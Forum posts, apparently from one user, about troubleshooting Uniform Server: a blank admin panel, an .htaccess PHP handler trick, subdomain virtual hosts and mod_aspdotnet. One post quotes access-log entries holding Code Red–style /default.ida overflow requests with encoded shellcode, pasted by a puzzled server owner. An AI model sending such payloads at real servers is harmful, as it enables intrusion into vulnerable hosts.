  1. Hi I'm running Uniform Server 3.3 on my local computer (developping/testing) and I've used it for about a week now. I had another testing server before. Strange: today I've started the server as usual, but all I get is a white screen. There is absolutley nothing there. I didn't do anything out of ordinary the last couple of days (opdates for instance), so I can't figure it out what's wrong. When I'm starting the server I'm been redirected as usual to the /apanel/, but nothing. It seems like there is no server. Though I don't get any error when starting. I even restarted my computer, but didn't helped. Any ideas? Does any of you have this starnge problem? I'm running the server on a Win XP SP2
  2. For those who want to have this feature, there is a simple shortcut and it dosen't require to cahnge your http.conf. Just add this line to the .htaccess file: addtype application/x-httpd-php .html .htm .bla You can add wathever you might want to, even something crazy, like .bla, your name or your nickname. In other words, personlize your site. If you do have.... personality.
  3. Hi guys, I have no idea if this is the place to ask, so you'll have to forgive me. I'm hosting my domain with my computer and uniformServer as... server. Today while reading access.log (just pure curiosrity) I observed some really strange entries into the log. If necessary I can post all entries I'm talking about, but for now I will just post a fragment. I can see in the error.log that the requests are treated either as "File does not exist" or "URI too long". Never the less, is someone trying to atack the server or what? Here's a fragment: >> 211.158.113.35 - - [23/Mar/2005:20:02:10 +0100] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u 6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u 00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 1323 >> 222.91.35.92 - - [23/Mar/2005:20:10:49 +0100] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858% ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190% u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 1323 >>216.251.92.99 - - [23/Mar/2005:20:18:30 +0100] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b% u53ff%u0078%u0000%u00=a HTTP/1.0" 404 1323 There are few some are really really long, looking like "x90\x02\xb1\x02\xb1\x". Any ideas? Do you know what deault.ida might be? There is no such file on my server.

    subdomains

I just did a first test drive and it's working. At least I didn't get any error and everything's served frim the folder it supose to. Just have this in mind: it's really late here (01:50) and I might be tired. I'll test some more tomorrow, just to be on the safe side. Great! Thanks! P.S. I forgot to say it before, but I don't think I'm getting email notifications of replies, although I've check that option. Is it just me?

    subdomains

Well, as I said, I tested with a REAL domain, not localhost. It's my own domain! You can be sure of that. I really like uniformServer and wanna to use it. I think is the smartest server package I ever see. Thanks!

    subdomains

I’ve spent many hours trying to get uniformServer to serve subdomains. No luck. No matters what, it will ALLAYS serve the folder that is the root (you know, the "www" folder. So I installed the original Apache and configure it to work with my domain (a real domain, not localhost) and with 3 subdomains. It works like a charm. Each subdomain it’s served from the folder assigned in the conf file. So the big question is: why uniformServer uses the same folder (the root one) for all (sub)domains? I must say: I’ve got a lot of experience trying to figure it out and I was happy to have it working with Apache, but what I really want is to have it working with uniformServer. Any thoughts? Olajide => thanks for the tutorials!

    mod_aspdotnet

I know you have other better things to do, but when and if you have time, consider adding mod_aspdotnet to uniServer. I know it's only working under Windows, but it will be nice to have the possibility to do some C#. I still want my php, but why not getting the best of both worlds? At least could anyone tell how should one try to add the module? I guess it's not sufficient to just download the module (a msi installer) and instal.

    subdomains

Hi there Although I’m new on this forum, I’ve been playing with uniserver for some time and let me say this: it’s brilliant. Congratulations! I have a problem and hope to get some help. I’m hosting a domain on my own computer and I need to set up 3 sub domains (at least for now), but it doesn’t seems to work. I had did this with a “regular” Apache without problem. But uniserver seems to just take the first virtual (sub)domain and use it as it would be the main domain, so all my subdomains and my main domain point to this one. What’s funny is that the browser shows subdomain.mydomain.dk, but the content is the same for all, including my main domain. Any idea? I know my explanation it’s not very clear. The point is: how would one set up subdomains? Is there a plug in? Thanks gopo P.S. I have little experience with apache and I'm not verry good at this things. I just like to play with php.
